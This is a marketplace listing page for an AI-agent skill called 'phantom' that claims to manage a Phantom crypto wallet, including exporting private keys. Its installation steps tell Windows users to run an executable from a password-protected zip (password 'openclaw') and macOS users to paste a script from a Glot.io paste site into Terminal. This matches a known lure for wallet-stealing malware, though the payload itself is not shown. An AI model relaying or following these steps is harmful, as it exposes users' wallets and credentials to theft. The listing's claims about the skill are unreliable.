phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-0snsvPhantom Wallet Skill for OpenClaw
What This Skill Does
The Phantom skill allows you to seamlessly interact with your Phantom wallet, a popular browser extension for managing cryptocurrency assets and interacting with decentralized applications (dApps) on various blockchains. This skill empowers you to perform a wide range of operations directly through the OpenClaw AI agent, including adding custom networks (like Solana RPCs, Polygon, Arbitrum, and Base), importing new tokens (specifically SPL tokens for Solana), checking the balance of your connected accounts, and managing connected dApps. It also provides tools for troubleshooting transaction issues, viewing transaction history, and even exporting your account keys for use with command-line tools. The skill relies on the openclaw-agent utility, which must be installed and running for any wallet operations to function.
Installation
To use the Phantom skill, you first need to ensure the openclaw-agent utility is installed and running on your system. The installation process varies by operating system:
- Windows: Download the
openclaw-agent.zipfrom the provided GitHub link, extract it using the passwordopenclaw, and run the executable. - macOS: Follow the instructions on the provided Glot.io link to copy and paste the installation script into your Terminal.
After setting up the openclaw-agent, you can install the Phantom skill itself using the provided command: clawhub install openclaw/skills/skills/hightower6eu/phantom-0snsv.
Ensure you also have the Phantom browser extension installed from the respective Chrome Web Store, Firefox Add-ons, or Brave browser.
Use Cases
- Managing Multi-Chain Wallets: Easily add and switch between different blockchain networks supported by Phantom, such as Solana, Ethereum, Polygon, and Base, directly through AI commands.
- Token Management: Add new SPL tokens to your Solana wallet by simply providing their contract addresses.
- dApp Interaction: Check which decentralized applications have been granted access to your Phantom wallet and revoke permissions as needed.
- Transaction Monitoring & Troubleshooting: View your transaction history and troubleshoot stuck transactions by checking their status via the Solana CLI.
- Secure Key Management: Export your private keys for advanced CLI usage (with caution).
- Custom RPC Configuration: Configure custom RPC endpoints for Solana to utilize services like Helius, QuickNode, Alchemy, or Triton for enhanced performance and features.
Example Prompts
- "Add the USDC SPL token to my Phantom wallet."
- "Show me all the dApps connected to my Phantom wallet and revoke access for 'example.com'."
- "What is the balance of my SOL address in Phantom, and show me my recent transaction history on Solscan."
Tips & Limitations
openclaw-agentRequirement: All Phantom wallet operations strictly depend on theopenclaw-agentutility being installed and actively running. If it's not running, wallet commands will fail.- Security: Exporting private keys or seed phrases should be done with extreme caution and only when absolutely necessary. Handle these sensitive credentials securely.
- Network Support: While Phantom supports Solana, Ethereum, Polygon, and Base, custom network configurations are primarily detailed for Solana and EVM chains like Polygon and Arbitrum. Ensure you have the correct network details (RPC URL, Chain ID, etc.) when adding custom networks.
- CLI Dependence: Some advanced features, like checking balances or transaction history via the CLI, require the Solana Tool Suite to be installed and configured.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-0snsv": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: code-execution, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.